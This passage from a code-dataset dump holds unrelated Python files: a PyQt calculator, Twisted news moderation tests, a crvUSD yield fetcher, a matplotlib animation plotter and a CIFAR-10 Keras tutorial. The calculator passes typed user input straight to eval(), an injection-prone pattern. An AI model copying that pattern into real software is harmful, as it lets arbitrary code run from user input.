)\r\n\t\tself.setWindowFlags ( QtCore.Qt.Window | QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowTitleHint |\r\n\t\t QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowStaysOnTopHint |\r\n\t\t QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint )\r\n\r\n\t\tself.listButtons = [ self.btn0, self.btn1, self.btn2, self.btn3,\r\n\t\t\t\t\t\t\t self.btn4, self.btn5, self.btn6, self.btn7,\r\n\t\t\t\t\t\t\t self.btn8, self.btn9, self.btnDot,\r\n\t\t\t\t\t\t\t self.btnPlus, self.btnMinus, self.btnMultiply, self.btnDivide,\r\n\t\t\t\t\t\t\t self.btnDel, self.btnAc, self.btnEqual, self.btnSquareRoot ]\r\n\r\n\t\tfor index in range ( 15 ):\r\n\t\t\t# for some reason, lamda doesn't work here but partial works\r\n\t\t\t#self.listButtons [ index ].clicked.connect ( lambda: self.cbBtnNumberClicked ( self.listButtons [ index ].text () ) )\r\n\t\t\tself.listButtons [ index ].clicked.connect ( partial ( self.cbBtnNumberClicked, self.listButtons [ index ].text () ) )\r\n\r\n\t\tself.btnDel.clicked.connect ( self.cbBtnDelClicked )\r\n\t\tself.btnAc.clicked.connect ( self.cbBtnAcClicked 
)\r\n\t\tself.btnEqual.clicked.connect ( self.cbBtnEqualClicked )\r\n\t\tself.btnSquareRoot.clicked.connect ( self.cbBtnSquareRootClicked )\r\n\r\n\tdef cbBtnNumberClicked ( self, text ):\r\n\t\tcurrent_value = self.txtResult.text ()\r\n\t\tnew_value = current_value + str ( text )\r\n\t\tself.txtResult.setText ( new_value )\r\n\r\n\tdef cbBtnEqualClicked ( self ):\r\n\t\tresult = eval ( self.txtResult.text () )\r\n\t\tself.txtResult.setText ( str ( result ) )\r\n\r\n\tdef cbBtnAcClicked ( self ):\r\n\t\tself.txtResult.setText ( \"\" )\r\n\r\n\tdef cbBtnDelClicked ( self ):\r\n\t\tcurrent_value = self.txtResult.text ()\r\n\t\tself.txtResult.setText ( current_value[:-1] )\r\n\r\n\tdef cbBtnSquareRootClicked ( self ):\r\n\t\tvalue = float ( self.txtResult.text () )\r\n\t\tself.txtResult.setText ( str ( math.sqrt ( value ) ) )\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tapp = QtWidgets.QApplication(sys.argv)\r\n\twindow = Calculator()\r\n\twindow.show()\r\n\tsys.exit(app.exec_())\r\n","repo_name":"ylyang-dev/Calculator","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71710699848","text":"__metaclass__ = type\n\nfrom email.Parser import Parser\nfrom socket import gethostname\n\nfrom twisted.trial.unittest import TestCase\nfrom twisted.internet.defer import succeed\nfrom twisted.mail.smtp import messageid\nfrom twisted.news.database import Article, PickleStorage, NewsShelf\n\n\n\nclass ModerationTestsMixin:\n \"\"\"\n Tests for the moderation features of L{INewsStorage} implementations.\n \"\"\"\n def setUp(self):\n self._email = []\n\n\n def sendmail(self, smtphost, from_addr, to_addrs, msg,\n senderDomainName=None, port=25):\n \"\"\"\n Fake of L{twisted.mail.smtp.sendmail} which records attempts to send\n email and immediately pretends success.\n\n Subclasses should arrange for their storage implementation to call this\n instead of the real C{sendmail} function.\n \"\"\"\n self._email.append((\n smtphost, from_addr, to_addrs, msg, senderDomainName, port))\n return succeed(None)\n\n\n _messageTemplate = \"\"\"\\\nFrom: some dude\nTo: another person\nSubject: activities etc\nMessage-ID: %(articleID)s\nNewsgroups: %(newsgroup)s\n%(approved)s\nBody of the message is such.\n\"\"\".replace('\\n', '\\r\\n')\n\n\n def getApprovedMessage(self, articleID, group):\n \"\"\"\n Return a C{str} containing an RFC 2822 formatted message including an\n I{Approved} header indicating it has passed through moderation.\n \"\"\"\n return self._messageTemplate % {\n 'articleID': articleID,\n 'newsgroup': group,\n 'approved': 'Approved: yup\\r\\n'}\n\n\n def getUnapprovedMessage(self, articleID, group):\n \"\"\"\n Return a C{str} containing an RFC 2822 formatted message with no\n I{Approved} header indicating it may require moderation.\n \"\"\"\n return self._messageTemplate % {\n 'articleID': articleID,\n 'newsgroup': group,\n 'approved': '\\r\\n'}\n\n\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Override in a subclass to return a L{INewsStorage} provider to test for\n correct moderation behavior.\n\n @param groups: A C{list} of C{str} naming the groups which should exist\n in the resulting storage object.\n\n @param moderators: A C{dict} mapping C{str} each group name to a C{list}\n of C{str} giving moderator email (RFC 2821) addresses.\n \"\"\"\n raise NotImplementedError()\n\n\n def test_postApproved(self):\n \"\"\"\n 
L{INewsStorage.postRequest} posts the message if it includes an\n I{Approved} header.\n \"\"\"\n group = \"example.group\"\n moderator = \"alice@example.com\"\n mailhost = \"127.0.0.1\"\n sender = \"bob@example.org\"\n articleID = messageid()\n storage = self.getStorage(\n [group], {group: [moderator]}, mailhost, sender)\n message = self.getApprovedMessage(articleID, group)\n result = storage.postRequest(message)\n\n def cbPosted(ignored):\n self.assertEqual(self._email, [])\n exists = storage.articleExistsRequest(articleID)\n exists.addCallback(self.assertTrue)\n return exists\n result.addCallback(cbPosted)\n return result\n\n\n def test_postModerated(self):\n \"\"\"\n L{INewsStorage.postRequest} forwards a message to the moderator if it\n does not include an I{Approved} header.\n \"\"\"\n group = \"example.group\"\n moderator = \"alice@example.com\"\n mailhost = \"127.0.0.1\"\n sender = \"bob@example.org\"\n articleID = messageid()\n storage = self.getStorage(\n [group], {group: [moderator]}, mailhost, sender)\n message = self.getUnapprovedMessage(articleID, group)\n result = storage.postRequest(message)\n\n def cbModerated(ignored):\n self.assertEqual(len(self._email), 1)\n self.assertEqual(self._email[0][0], mailhost)\n self.assertEqual(self._email[0][1], sender)\n self.assertEqual(self._email[0][2], [moderator])\n self._checkModeratorMessage(\n self._email[0][3], sender, moderator, group, message)\n self.assertEqual(self._email[0][4], None)\n self.assertEqual(self._email[0][5], 25)\n exists = storage.articleExistsRequest(articleID)\n exists.addCallback(self.assertFalse)\n return exists\n result.addCallback(cbModerated)\n return result\n\n\n def _checkModeratorMessage(self, messageText, sender, moderator, group, postingText):\n p = Parser()\n msg = p.parsestr(messageText)\n headers = dict(msg.items())\n del headers['Message-ID']\n self.assertEqual(\n headers,\n {'From': sender,\n 'To': moderator,\n 'Subject': 'Moderate new %s message: activities etc' % (group,),\n 'Content-Type': 'message/rfc822'})\n\n posting = p.parsestr(postingText)\n attachment = msg.get_payload()[0]\n\n for header in ['from', 'to', 'subject', 'message-id', 'newsgroups']:\n self.assertEqual(posting[header], attachment[header])\n\n self.assertEqual(posting.get_payload(), attachment.get_payload())\n\n\n\nclass PickleStorageTests(ModerationTestsMixin, TestCase):\n \"\"\"\n Tests for L{PickleStorage}.\n \"\"\"\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Create and return a L{PickleStorage} instance configured to require\n moderation.\n \"\"\"\n storageFilename = self.mktemp()\n storage = PickleStorage(\n storageFilename, groups, moderators, mailhost, sender)\n storage.sendmail = self.sendmail\n self.addCleanup(PickleStorage.sharedDBs.pop, storageFilename)\n return storage\n\n\n\nclass NewsShelfTests(ModerationTestsMixin, TestCase):\n \"\"\"\n Tests for L{NewsShelf}.\n \"\"\"\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Create and return a L{NewsShelf} instance configured to require\n moderation.\n \"\"\"\n storageFilename = self.mktemp()\n shelf = NewsShelf(mailhost, storageFilename, sender)\n for name in groups:\n shelf.addGroup(name, 'm') # Dial 'm' for moderator\n for address in moderators.get(name, []):\n shelf.addModerator(name, address)\n shelf.sendmail = self.sendmail\n return shelf\n\n\n def test_notifyModerator(self):\n \"\"\"\n L{NewsShelf.notifyModerator} sends a moderation email to a single\n moderator.\n \"\"\"\n shelf = NewsShelf('example.com', 
self.mktemp(), 'alice@example.com')\n shelf.sendmail = self.sendmail\n shelf.notifyModerator('bob@example.org', Article('Foo: bar', 'Some text'))\n self.assertEqual(len(self._email), 1)\n\n\n def test_defaultSender(self):\n \"\"\"\n If no sender is specified to L{NewsShelf.notifyModerators}, a default\n address based on the system hostname is used for both the envelope and\n RFC 2822 sender addresses.\n \"\"\"\n shelf = NewsShelf('example.com', self.mktemp())\n shelf.sendmail = self.sendmail\n shelf.notifyModerators(['bob@example.org'], Article('Foo: bar', 'Some text'))\n self.assertEqual(self._email[0][1], 'twisted-news@' + gethostname())\n self.assertIn('From: twisted-news@' + gethostname(), self._email[0][3])\n","repo_name":"Chudry/Xerror","sub_path":"env/lib/python2.7/site-packages/twisted/news/test/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":477,"dataset":"github-code","pt":"16"} +{"seq_id":"37659028913","text":"from operator import and_\nfrom typing import List\nimport requests\nfrom sqlalchemy import func\nimport logging\nfrom main import db\nfrom models.convex.snapshot import ConvexPoolSnapshot\nfrom models.curve.crvusd import CrvUsdYield\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_latest_convex_pool_apr() -> List:\n subquery = (\n db.session.query(\n ConvexPoolSnapshot.poolName,\n func.max(ConvexPoolSnapshot.timestamp).label(\"max_timestamp\"),\n )\n .filter(\n ConvexPoolSnapshot.poolName.ilike(\n \"%Curve.fi Factory Plain Pool: crvUSD%\"\n )\n )\n .group_by(ConvexPoolSnapshot.poolName)\n .subquery()\n )\n\n result = (\n db.session.query(\n ConvexPoolSnapshot.baseApr,\n ConvexPoolSnapshot.crvApr,\n ConvexPoolSnapshot.cvxApr,\n ConvexPoolSnapshot.extraRewardsApr,\n ConvexPoolSnapshot.timestamp,\n ConvexPoolSnapshot.poolName,\n )\n .join(\n subquery,\n and_(\n ConvexPoolSnapshot.poolName == subquery.c.poolName,\n ConvexPoolSnapshot.timestamp == subquery.c.max_timestamp,\n ),\n )\n .all()\n )\n\n return [\n CrvUsdYield(\n platform=\"Convex\", pool=r[5], apy=(r[0] + r[1] + r[2] + r[3]) * 100\n )\n for r in result\n ]\n\n\ndef get_max_boost_curve_yield() -> List[CrvUsdYield]:\n CURVE_APR = \"https://www.convexfinance.com/api/curve-apys\"\n r = requests.get(CURVE_APR)\n return [\n CrvUsdYield(\n platform=\"Curve (max boost)\",\n pool=k,\n apy=v[\"crvApy\"] + v[\"baseApy\"],\n )\n for k, v in r.json()[\"apys\"].items()\n if \"factory-crvusd\" in k\n ]\n\n\ndef get_std_yields() -> List[CrvUsdYield]:\n STD_YIELD = \"https://lockers.stakedao.org/api/strategies/cache/curve\"\n r = requests.get(STD_YIELD)\n yields = {\n a[\"name\"]: sum([b[\"apr\"] for b in a[\"aprBreakdown\"]]) * 100\n for a in r.json()\n if \"crvusd\" in a[\"key\"]\n }\n return [\n CrvUsdYield(platform=\"StakeDAO\", pool=k, apy=v)\n for k, v in yields.items()\n ]\n\n\ndef get_crv_usd_yields() -> List[CrvUsdYield]:\n try:\n convex_yields = get_latest_convex_pool_apr()\n except Exception as e:\n logger.error(f\"Error fetching Convex yields : {e}\")\n convex_yields = []\n try:\n curve_yields = get_max_boost_curve_yield()\n except Exception as e:\n logger.error(f\"Error fetching Curve yields : {e}\")\n curve_yields = []\n try:\n std_yields = get_std_yields()\n except Exception as e:\n logger.error(f\"Error fetching StakeDAO yields : {e}\")\n std_yields = []\n\n return convex_yields + curve_yields + 
std_yields\n","repo_name":"convex-community/subgraphs-api","sub_path":"app/services/curve/yields.py","file_name":"yields.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16765341612","text":"\"\"\"Offer a field plotter.\"\"\"\nimport copy\nimport warnings\nfrom typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Union\n\nimport numpy as np\nimport numpy.typing as npt\nfrom matplotlib import colors\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib.axes import Axes\nfrom matplotlib.colorbar import Colorbar\nfrom matplotlib.figure import Figure, SubFigure\nfrom matplotlib.image import AxesImage\nfrom matplotlib.lines import Line2D\nfrom matplotlib.text import Text\n\nfrom nested_grid_plotter.base_plotter import NestedGridPlotter\nfrom nested_grid_plotter.imshow import (\n _apply_default_colorbar_kwargs,\n _apply_default_imshow_kwargs,\n _check_axes_and_data_consistency,\n _scale_cbar,\n)\n\n# pylint: disable=C0103 # does not confrom to snake case naming style\n# pylint: disable=R0913 # too many arguments\n# pylint: disable=R0914 # too many local variables\n\n# Define some types for numpy\nNDArrayFloat = npt.NDArray[np.float64]\nNDArrayInt = npt.NDArray[np.int64]\n\n\ndef _get_nb_frames(nb_frames: Optional[int], nb_steps: int) -> int:\n \"\"\"\n Get the correct number of frames.\n\n Parameters\n ----------\n nb_frames : Optional[int]\n Number of frames to plot. If None, then the number of steps is used.\n nb_steps : int\n Number of steps (data arrays available for plot).\n\n Returns\n -------\n int\n The correct number of frames.\n\n Raises\n ------\n warnings.warn\n If the nb_frames required exceeds the number of steps.\n \"\"\"\n if nb_frames is None:\n return nb_steps\n if nb_frames > nb_steps:\n warnings.warn(\n UserWarning(\n f\"The nb_frames ({nb_frames}) required exceeds the number of steps\"\n f\" available (last dimension of arrays = {nb_steps})!\"\n \" Some images will be repeated.\"\n )\n )\n return nb_frames\n\n\nclass AnimatedPlotter(NestedGridPlotter):\n \"\"\"Nestedgrid plotter with embedded animation support.\"\"\"\n\n _animation: Optional[FuncAnimation]\n\n def __init__(\n self,\n fig_params: Optional[Dict[str, Any]] = None,\n subfigs_params: Optional[Dict[str, Any]] = None,\n subplots_mosaic_params: Optional[Dict[str, Any]] = None,\n ) -> None:\n \"\"\"\n Initiate the instance.\n\n Parameters\n ----------\n fig_params : Optional[Dict[str, Any]], optional\n See :class:`NestedGridPlotter` for other possible arguments.\n The default is None.\n subfigs_params : Optional[Dict[str, Any]], optional\n DESCRIPTION. The default is None.\n subplots_mosaic_params : Optional[Dict[str, Any]], optional\n DESCRIPTION. 
The default is None.\n\n Returns\n -------\n None\n \"\"\"\n _fig_params = dict(constrained_layout=True)\n if fig_params is not None:\n _fig_params.update(fig_params)\n\n super().__init__(_fig_params, subfigs_params, subplots_mosaic_params)\n # self.fig.patch.set_facecolor(\"w\")\n self.init_animations_list: List[Callable] = []\n self.animations_list: List[Callable] = []\n self.animation = None\n\n @property\n def animation(self) -> FuncAnimation:\n \"\"\"Get the animation or raise an attribute error if not defined.\"\"\"\n if self._animation is None:\n raise AttributeError(\"No animation as been defined !\")\n return self._animation\n\n @animation.setter\n def animation(self, animation: Optional[FuncAnimation]) -> None:\n self._animation = animation\n\n def _init_animate(self) -> List[Union[Line2D, AxesImage]]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n return [f for f_list in self.init_animations_list for f in f_list()]\n\n def _animate(self, i) -> List[Union[Line2D, AxesImage]]:\n \"\"\"Update the data of the plot.\"\"\"\n return [f for f_list in self.animations_list for f in f_list(i)]\n\n def animate(self, nb_frames: int, blit: bool = True) -> FuncAnimation:\n \"\"\"\n Animate the plot.\n\n Parameters\n ----------\n nb_frames : int\n The number of frames to consider for the animation.\n blit: bool, optional\n Whether blitting is used to optimize drawing. Note: when using blitting,\n any animated artists will be drawn according to their zorder; however,\n they will be drawn on top of any previous artists, regardless of their\n zorder. The default is True.\n\n Returns\n -------\n animation.FuncAnimation\n The animation.\n\n \"\"\"\n # plt.close(self.fig)\n self.animation = FuncAnimation(\n self.fig,\n self._animate,\n init_func=self._init_animate,\n frames=range(nb_frames),\n interval=1,\n blit=blit,\n repeat=False,\n )\n return self.animation\n\n def plot_animated_text(\n self, ax: Axes, x: float, y: float, s: Sequence[str], **kwargs: Any\n ) -> None:\n \"\"\"\n Add a text animation to the given axis.\n\n Parameters\n ----------\n ax : Axes\n Axis to which add the text.\n x : float\n x position of the text.\n y : float\n y position of the text.\n s : Sequence[str]\n Sequence of text value to display.\n **kwargs : Dict[str, Any]\n Optional arguments for the class:`Text`.\n\n Returns\n -------\n None\n\n \"\"\"\n txt: Text = ax.text(x, y, s[0], **kwargs)\n\n def _animate(frame: int) -> List[Text]:\n \"\"\"Update the text value.\"\"\"\n txt.set_text(s[frame])\n return [\n txt,\n ]\n\n # self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n def animated_multi_plot(\n self,\n ax_name: str,\n data: Dict[str, Dict[str, Any]],\n nb_frames: Optional[int] = None,\n title: Optional[str] = None,\n xlabel: Optional[str] = None,\n ylabel: Optional[str] = None,\n ) -> None:\n \"\"\"\n Plot a 1D animated curves.\n\n The number of frames can be determined automatically from the data.\n\n Parameters\n ----------\n ax_name : str\n Name of the axis on which to plot the animation.\n data : Dict[str, Dict[str, Any]]]\n Data to be plotted.\n nb_frames: int\n Number of frames to use in the animation. If None, the second dimension of\n the provided data arrays is used.\n title : Optional[str], optional\n Title to give to the plot. The default is None.\n xlabel : Optional[str], optional\n Label for the xaxis. The default is None.\n ylabel : Optional[str], optional\n Label for the yaxis. 
The default is None.\n\n Raises\n ------\n ValueError\n If the provided `data` dictionary contains inconsistent arrays.\n\n Returns\n -------\n None\n\n \"\"\"\n ax: Axes = self.ax_dict[ax_name]\n\n # store all data in a list\n x_list: List[NDArrayFloat] = []\n y_list: List[NDArrayFloat] = []\n # The results are stored in plot_dict and allow updating the values.\n plot_dict = {}\n\n for label, val in data.items():\n kwargs: Dict[str, Any] = val.get(\"kwargs\", {})\n x = val.get(\"x\", None)\n _val = val.get(\"y\")\n if _val is not None:\n y: NDArrayFloat = _val\n else:\n raise ValueError(\n f'Error with data arguments: for key \"{label}\" y must be given!'\n )\n\n # Generate a series to adjust the y axis bounds without setting\n # y_extend = np.nanmax(y_list) - np.nanmin(y_list)\n y_extend = np.linspace(np.nanmin(y), np.nanmax(y), y.shape[0])\n\n if x is not None:\n x_extend = np.linspace(np.nanmin(x), np.nanmax(x), x.shape[0])\n x_list.append(x.reshape(x.shape[0], -1)) # make sure that x is 2d\n else:\n x_extend = np.arange(y.shape[0])\n plot_dict[label] = ax.plot(x_extend, y_extend, label=label, **kwargs)[0]\n y_list.append(y)\n\n nb_steps: int = y_list[0].shape[1]\n\n # Number of x and y consistency\n if len(x_list) != 0 and (len(x_list) != len(y_list)):\n raise ValueError(\n \"When the x vector is provided, it must be for each y vector!\"\n )\n\n # Check that all arrays have the same number of frames\n if not all((y_list[0].shape[1] == y.shape[1] for y in y_list[1:])):\n raise ValueError(\n \"Not all given y arrays have the same number of steps (last dimension)!\"\n )\n if len(x_list) > 1:\n if not all((x_list[0].shape[1] == x.shape[1] for x in x_list[1:])):\n raise ValueError(\n \"Not all given x arrays have the same number \"\n \"of steps (last dimension)!\"\n )\n\n # Check the dimensions\n if not all((y_list[0].shape[0] == y.shape[0] for y in y_list[1:])):\n raise ValueError(\n \"Not all given y arrays have the same first dimension (n values)!\"\n )\n\n if title:\n ax.set_title(title, fontweight=\"bold\")\n if xlabel:\n ax.set_xlabel(xlabel, fontweight=\"bold\")\n if ylabel:\n ax.set_ylabel(ylabel, fontweight=\"bold\")\n\n def _init() -> List[Line2D]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n for label in data.keys():\n plot_dict[label].set_ydata(\n np.full(y_list[0][:, 0].size, fill_value=np.nan),\n )\n return list(plot_dict.values())\n\n _nb_frames: int = _get_nb_frames(nb_frames, nb_steps)\n\n def _animate(frame_index: int) -> List[Line2D]:\n \"\"\"Update the data of the plot.\"\"\"\n # subtract -1 to nb_steps and _nb_frames so that when\n # frame_index = 0, we get the first element of x_list, and when\n # frame_index = _nb_frames - 1, we get the last element of x_list.\n data_index: int = int((nb_steps - 1) / (_nb_frames - 1) * frame_index)\n for index, label in enumerate(data.keys()):\n # update x\n if len(x_list) != 0:\n try:\n plot_dict[label].set_xdata(x_list[index][:, data_index])\n except IndexError:\n pass\n # update y\n plot_dict[label].set_ydata(\n y_list[index][:, data_index],\n )\n return list(plot_dict.values())\n\n self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n def animated_multi_imshow(\n self,\n ax_names: Iterable[str],\n data: Dict[str, NDArrayFloat],\n fig: Optional[Union[Figure, SubFigure]] = None,\n nb_frames: Optional[int] = None,\n xlabel: Optional[str] = None,\n ylabel: Optional[str] = None,\n imshow_kwargs: Optional[Dict[str, Any]] = None,\n cbar_kwargs: Optional[Dict[str, Any]] = None,\n 
is_symetric_cbar: bool = False,\n cbar_title: Optional[str] = None,\n ) -> Colorbar:\n \"\"\"\n Plot an animated 2D field with imshow.\n\n The number of frames can be determined automatically from the data.\n\n Parameters\n ----------\n ax_names : str\n List of axis names in which to plot the data. The order of axes must be\n the same as that of the data.\n data : Dict[str, Union[np.ndarray, Dict[str, Any]]]\n Data to be plotted.\n fig: Optional[Figure, SubFigure]\n Which figure to consider for the color bar. By default, use self.fig.\n nb_frames : Optional[int]\n Number of frame to use. By default, it is the number of provided steps,\n that is to say the last dimension of the arrays. If the number of frames\n exceeds the number of steps available, some steps will be repeated once\n or more and a warning is raised.\n xlabel : Optional[str], optional\n Label to apply to all xaxes. The default is None.\n ylabel : Optional[str], optional\n Label to apply to all yaxes. The default is None.\n imshow_kwargs: Optional[Dict[str, Any]] optional\n Optional arguments for `plt.imshow`. The default is None.\n\n Examples\n --------\n Examples can be given using either the ``Example`` or ``Examples``\n sections. Sections support any reStructuredText formatting, including\n literal blocks::\n\n $ python example_numpy.py\n\n Raises\n ------\n ValueError\n If the provided `data` dictionary contains inconsistent arrays.\n\n Returns\n -------\n None\n\n \"\"\"\n axes: list[Axes] = [self.ax_dict[ax_name] for ax_name in ax_names]\n # The number of ax_name and data provided should be the same:\n _check_axes_and_data_consistency(axes, data)\n\n # Add some default values for imshow and colorbar\n _imshow_kwargs: Dict[str, Any] = _apply_default_imshow_kwargs(imshow_kwargs)\n _cbar_kwargs: Dict[str, Any] = _apply_default_colorbar_kwargs(cbar_kwargs, axes)\n\n # store all data in a list\n data_list = []\n # The results are stored in plot_dict and allow updating the values.\n\n images_dict: Dict[str, AxesImage] = {}\n for j, (label, values) in enumerate(data.items()):\n ax = self.ax_dict[ax_names[j]]\n if not len(values.shape) == 3:\n raise ValueError(\n f'The given data for \"{label}\" has shape {values.shape} '\n \"whereas it should be three dimensional!\"\n )\n\n # Need to transpose because the dimensions (M, N) define the rows and\n # columns\n # Also, need to copy the _imshow_kwargs to avoid its update. 
Otherwise the\n # colorbar scaling does not work properly\n images_dict[label] = ax.imshow(\n values[:, :, 0].T, **copy.deepcopy(_imshow_kwargs)\n )\n data_list.append(values)\n\n ax.label_outer()\n ax.set_title(label, weight=\"bold\")\n if xlabel is not None:\n ax.set_xlabel(xlabel, fontweight=\"bold\")\n if ylabel is not None:\n ax.set_ylabel(ylabel, fontweight=\"bold\")\n\n nb_steps: int = data_list[0].shape[2]\n\n # Check that all arrays have the same number of timesteps\n if not all((nb_steps == x.shape[2] for x in data_list[1:])):\n raise ValueError(\n \"Not all given arrays have the same number of steps (last dimension)!\"\n )\n\n # Colorbar scaling\n norm: Optional[colors.Normalize] = _imshow_kwargs.get(\"norm\")\n if norm is not None:\n vmin: Optional[float] = norm.vmin\n vmax: Optional[float] = norm.vmax\n if isinstance(norm, colors.LogNorm):\n _scale_cbar(\n list(images_dict.values()),\n list(data.values()),\n False,\n is_log=True,\n vmin=vmin,\n vmax=vmax,\n )\n elif isinstance(_imshow_kwargs.get(\"norm\"), colors.Normalize):\n _scale_cbar(\n list(images_dict.values()),\n list(data.values()),\n is_symetric_cbar,\n vmin=vmin,\n vmax=vmax,\n )\n\n if fig is None:\n _fig: Union[Figure, SubFigure] = self.fig\n else:\n _fig: Union[Figure, SubFigure] = fig\n\n # pylint: disable=C0123 # use isinstance instead\n cbar: Colorbar = _fig.colorbar(list(images_dict.values())[0], **_cbar_kwargs)\n if cbar_title is not None:\n cbar.ax.get_yaxis().labelpad = 20\n cbar.ax.set_ylabel(cbar_title, rotation=270)\n\n def _init() -> List[AxesImage]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n for label, values in data.items():\n images_dict[label].set_data(\n np.full(values[:, :, 0].T.shape, fill_value=np.nan),\n )\n return list(images_dict.values())\n\n _nb_frames: int = _get_nb_frames(nb_frames, nb_steps)\n\n def _animate(frame_index: int) -> List[AxesImage]:\n \"\"\"Update the data of the plot.\"\"\"\n # subtract -1 to nb_steps and _nb_frames so that when\n # frame_index = 0, we get the first element of x_list, and when\n # frame_index = _nb_frames - 1, we get the last element of x_list.\n data_index: int = int((nb_steps - 1) / (_nb_frames - 1) * frame_index)\n for label in data.keys():\n images_dict[label].set_data(\n data[label][:, :, data_index].T,\n )\n return list(images_dict.values())\n\n self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n return cbar\n","repo_name":"antoinecollet5/nested_grid_plotter","sub_path":"nested_grid_plotter/animated_plotter.py","file_name":"animated_plotter.py","file_ext":"py","file_size_in_byte":17421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37216384037","text":"import matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import cifar10\n\n# The dataset contains 50,000 training images and 10,000 test images.\n# Loading the dataset:\nprint('CIFAR-10 Dataset!')\n(train_X, train_Y), (test_X, test_Y) = cifar10.load_data()\n\n# CIFAR-10 contains these classes:\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'lorry']\n\n# -----------------------------\n# This function will display the first 16 images of the dataset with their labels:\ndef visualize_data(train_X, train_Y, class_names):\n\n for i in range(16):\n # create subplot:\n plt.subplot(4, 4, i+1)\n plt.xticks([])\n plt.yticks([])\n # plot image with the class name on the x-axis:\n plt.imshow(train_X[i])\n 
plt.xlabel(class_names[train_Y[i].item()])\n\n # adjust the subplots and show the first 16 images:\n plt.subplots_adjust(left=0.125,\n bottom=0.1, \n right=0.9, \n top=0.9, \n wspace=0.2, \n hspace=0.35)\n plt.show()\n# -----------------------------\n\n# Displaying the first sixteen images within the dataset:\nvisualize_data(train_X, train_Y, class_names)\n\n# Printing information about the loaded dataset:\nprint(f'There are {train_X.shape[0]} images of size {train_X.shape[1:]} in the Training set of the CIFAR-10 Dataset.')\nprint(f'There are {test_X.shape[0]} images of size {test_X.shape[1:]} in the Test set of the CIFAR-10 Dataset.')\n\n\"\"\"Now that the dataset has been verified, we can begin preparing for the training process. First, let's import all that we need:\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow import keras\nimport tensorflow as tf\n\nprint('Keras version:', keras.__version__)\nprint(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n\n\"\"\"We now define two functions that will load and process the data in preparation for training:\"\"\"\n\n# Function used to load the dataset:\ndef load_data():\n\n # Loading the built-in CIFAR-10 dataset from Keras:\n (train_X, train_Y), (test_X, test_Y) = cifar10.load_data()\n\n print('The dataset has been loaded:')\n print(f'Train: X={train_X.shape}, Y={train_Y.shape}')\n print(f'Test: X={test_X.shape}, Y={test_Y.shape}')\n\n # Converting the class labels to one hot vectors:\n train_Y = to_categorical(train_Y)\n test_Y = to_categorical(test_Y)\n\n return train_X, train_Y, test_X, test_Y\n \n# -----------------------------\n\n# Function used to prepare the data:\ndef pre_process_data(train_data, test_data):\n\n # Casting pixel values to floats:\n train_data = train_data.astype('float32')\n test_data = test_data.astype('float32')\n\n # normalising pixel values to range [0-1]\n train_data = train_data / 255.0\n test_data = test_data / 255.0\n\n print(f'Train data is in range {train_data.min()} to {train_data.max()}.')\n print(f'Test data is in range {test_data.min()} to {test_data.max()}.')\n\n return train_data, test_data\n\nprint('Done!')\n\n\"\"\"We will also define a function responsible for plotting the curves:\"\"\"\n\n# Function used to plot the curves for loss and accuracy:\ndef plot_curves(history):\n\n # Plotting the loss curve:\n plt.subplot(211)\n plt.title('Cross Entropy')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n # Plotting the training loss (blue):\n plt.plot(history.history['loss'], color='blue', label='train')\n # Plotting the test loss (red):\n plt.plot(history.history['val_loss'], color='red', label='test')\n # Legend for the plot:\n plt.legend(['train', 'test'], loc='upper left')\n\n # Plotting the accuracy curve:\n plt.subplot(212)\n plt.title('Classification Accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n # Plotting the training accuracy (blue):\n plt.plot(history.history['accuracy'], color='blue', label='train')\n # Plotting the test accuracy (red):\n plt.plot(history.history['val_accuracy'], color='red', label='test')\n # Legend for the plot:\n plt.legend(['train', 'test'], loc='upper 
